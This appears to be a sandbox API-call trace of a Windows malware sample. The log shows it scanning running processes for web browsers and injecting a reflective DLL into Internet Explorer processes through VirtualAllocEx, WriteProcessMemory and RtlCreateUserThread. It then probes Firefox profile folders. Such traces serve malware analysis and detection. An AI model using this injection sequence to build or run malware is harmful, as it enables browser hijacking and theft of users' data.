	[0188.625] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0188.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.626] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.626] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0188.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.626] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.626] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0188.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x218
	[0188.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.627] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0188.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.627] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.628] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0188.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.628] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.628] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0188.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x21c
	[0188.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.629] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0188.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.629] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.630] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0188.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.630] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.630] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0188.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x220
	[0188.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.631] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0188.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.633] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.634] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0188.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.634] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.635] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0188.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x224
	[0188.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.635] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0188.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.636] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.637] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0188.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.637] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.637] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0188.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x228
	[0188.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.638] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0188.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.639] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.639] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0188.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.640] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.641] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0188.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x22c
	[0188.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.641] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0188.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.642] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.642] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0188.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.643] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.643] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0188.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x230
	[0188.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.644] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0188.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.644] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0188.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.644] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0188.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.657] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.658] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77330000
	[0188.658] GetProcAddress (hModule=0x77330000, lpProcName="NtQueryInformationProcess") returned 0x77376048
	[0188.658] NtQueryInformationProcess (in: ProcessHandle=0x230, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0188.658] ReadProcessMemory (in: hProcess=0x230, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0188.658] ReadProcessMemory (in: hProcess=0x230, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0188.658] ReadProcessMemory (in: hProcess=0x230, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0188.659] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0188.659] GetLastError () returned 0x5
	[0188.659] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x364) returned 0x288c88
	[0188.659] SetLastError (dwErrCode=0x5) 
	[0188.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x10002c6b, lpParameter=0x101f9ec, dwCreationFlags=0x0, lpThreadId=0x101f98c | out: lpThreadId=0x101f98c*=0xa34) returned 0x234
	[0188.659] Sleep (dwMilliseconds=0x7d0) 
	[0190.664] GetNativeSystemInfo (in: lpSystemInfo=0x101f39c | out: lpSystemInfo=0x101f39c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0190.676] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76b10000
	[0190.676] GetProcAddress (hModule=0x76b10000, lpProcName="IsWow64Process") returned 0x76b54785
	[0190.676] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAllocEx") returned 0x76b4c1b6
	[0190.676] FreeLibrary (hLibModule=0x76b10000) returned 1
	[0190.676] IsWow64Process (in: hProcess=0x230, Wow64Process=0x101f310 | out: Wow64Process=0x101f310) returned 1
	[0190.676] GetNativeSystemInfo (in: lpSystemInfo=0x101f2ec | out: lpSystemInfo=0x101f2ec*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0190.676] strstr (_Str="?ReflectiveLoader@@YGXPAX0K0K@Z", _SubStr="ReflectiveLoader") returned="ReflectiveLoader@@YGXPAX0K0K@Z"
	[0190.676] VirtualAllocEx (hProcess=0x230, lpAddress=0x0, dwSize=0x13640, flAllocationType=0x3000, flProtect=0x40) returned 0x1a00000
	[0191.148] WriteProcessMemory (in: hProcess=0x230, lpBaseAddress=0x1a00000, lpBuffer=0x28b3f0*, nSize=0x13600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x28b3f0*, lpNumberOfBytesWritten=0x0) returned 1
	[0191.153] WriteProcessMemory (in: hProcess=0x230, lpBaseAddress=0x1a13600, lpBuffer=0x101f314*, nSize=0x20, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x101f314*, lpNumberOfBytesWritten=0x0) returned 1
	[0191.154] FlushInstructionCache (hProcess=0x230, lpBaseAddress=0x1a00000, dwSize=0x13640) returned 1
	[0191.154] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77330000
	[0191.154] GetProcAddress (hModule=0x77330000, lpProcName="RtlCreateUserThread") returned 0x77339250
	[0191.154] RtlCreateUserThread (in: ProcessHandle=0x230, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x1a13600, Parameter=0x0, ThreadHandle=0x101f310*=0x0, ClientId=0x0 | out: ThreadHandle=0x101f310*=0x244, ClientId=0x0) returned 0x0
	[0191.224] GetLastError () returned 0x5
	[0191.224] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0x61a8) returned 0x0
	[0191.224] GetExitCodeThread (in: hThread=0x244, lpExitCode=0x101f3e8 | out: lpExitCode=0x101f3e8) returned 1
	[0191.224] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x101f3c4 | out: lpSystemTimeAsFileTime=0x101f3c4*(dwLowDateTime=0x5b8435e0, dwHighDateTime=0x1d50a6a)) 
	[0191.224] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x286cb8
	[0191.224] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0191.225] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x248
	[0191.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0191.225] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0191.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0191.226] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0191.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0191.226] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0191.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0191.227] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0191.227] NtQueryInformationProcess (in: ProcessHandle=0x248, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0191.227] ReadProcessMemory (in: hProcess=0x248, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0191.227] ReadProcessMemory (in: hProcess=0x248, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0191.227] ReadProcessMemory (in: hProcess=0x248, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0191.227] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0191.228] GetLastError () returned 0x5
	[0191.228] SetLastError (dwErrCode=0x5) 
	[0191.228] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x10002c6b, lpParameter=0x101f9ec, dwCreationFlags=0x0, lpThreadId=0x101f98c | out: lpThreadId=0x101f98c*=0xbc8) returned 0x24c
	[0191.229] Sleep (dwMilliseconds=0x7d0) 
	[0193.297] GetNativeSystemInfo (in: lpSystemInfo=0x101f39c | out: lpSystemInfo=0x101f39c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0193.297] FreeLibrary (hLibModule=0x76b10000) returned 1
	[0193.297] IsWow64Process (in: hProcess=0x248, Wow64Process=0x101f310 | out: Wow64Process=0x101f310) returned 1
	[0193.297] GetNativeSystemInfo (in: lpSystemInfo=0x101f2ec | out: lpSystemInfo=0x101f2ec*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0193.297] strstr (_Str="?ReflectiveLoader@@YGXPAX0K0K@Z", _SubStr="ReflectiveLoader") returned="ReflectiveLoader@@YGXPAX0K0K@Z"
	[0193.297] VirtualAllocEx (hProcess=0x248, lpAddress=0x0, dwSize=0x13640, flAllocationType=0x3000, flProtect=0x40) returned 0x1a90000
	[0193.784] WriteProcessMemory (in: hProcess=0x248, lpBaseAddress=0x1a90000, lpBuffer=0x28b3f0*, nSize=0x13600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x28b3f0*, lpNumberOfBytesWritten=0x0) returned 1
	[0193.791] WriteProcessMemory (in: hProcess=0x248, lpBaseAddress=0x1aa3600, lpBuffer=0x101f314*, nSize=0x20, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x101f314*, lpNumberOfBytesWritten=0x0) returned 1
	[0193.792] FlushInstructionCache (hProcess=0x248, lpBaseAddress=0x1a90000, dwSize=0x13640) returned 1
	[0193.792] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77330000
	[0193.792] GetProcAddress (hModule=0x77330000, lpProcName="RtlCreateUserThread") returned 0x77339250
	[0193.792] RtlCreateUserThread (in: ProcessHandle=0x248, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x1aa3600, Parameter=0x0, ThreadHandle=0x101f310*=0x0, ClientId=0x0 | out: ThreadHandle=0x101f310*=0xac0, ClientId=0x0) returned 0x0
	[0193.853] GetLastError () returned 0x5
	[0193.853] WaitForSingleObject (hHandle=0xac0, dwMilliseconds=0x61a8) returned 0x0
	[0193.853] GetExitCodeThread (in: hThread=0xac0, lpExitCode=0x101f3e8 | out: lpExitCode=0x101f3e8) returned 1
	[0193.853] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x101f3c4 | out: lpSystemTimeAsFileTime=0x101f3c4*(dwLowDateTime=0x5cd3d7c0, dwHighDateTime=0x1d50a6a)) 
	[0193.853] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x1190180
	[0193.853] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0193.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xabc
	[0193.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.854] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0193.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.854] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.855] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0193.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.855] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.855] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0193.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xac4
	[0193.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.856] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0193.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.856] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.857] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0193.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.857] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.857] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xac8
	[0193.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.858] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.858] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.859] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.859] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.859] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.860] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0193.860] CloseHandle (hObject=0x188) returned 1
	[0193.860] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x101f08c, csidl=26, fCreate=1 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1
	[0193.861] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x11c29c0
	[0193.861] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x1183298
	[0193.861] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c29c0 | out: hHeap=0x260000) returned 1
	[0193.861] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x1183640
	[0193.861] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*", lpFindFileData=0x101f194 | out: lpFindFileData=0x101f194*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x101f1e0, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x101f848, ftLastWriteTime.dwLowDateTime=0x104, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x76b745c4, dwReserved1=0x22c, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0193.861] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1183640 | out: hHeap=0x260000) returned 1
	[0193.861] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1183298 | out: hHeap=0x260000) returned 1
	[0193.861] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x101f08c, csidl=28, fCreate=1 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1
	[0193.861] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x11c29c0
	[0193.861] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x1183298
	[0193.861] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c29c0 | out: hHeap=0x260000) returned 1
	[0193.861] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x1183640
	[0193.861] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\\\*", lpFindFileData=0x101f194 | out: lpFindFileData=0x101f194*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x101f1e0, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x101f848, ftLastWriteTime.dwLowDateTime=0x104, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x76b745c4, dwReserved1=0x22c, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0193.861] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1183640 | out: hHeap=0x260000) returned 1
	[0193.861] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1183298 | out: hHeap=0x260000) returned 1
	[0193.861] Sleep (dwMilliseconds=0x64) 
	[0193.957] GetCurrentProcessId () returned 0x110
	[0193.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0193.959] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0193.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0193.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0193.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xacc
	[0193.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.961] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0193.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.962] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.962] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
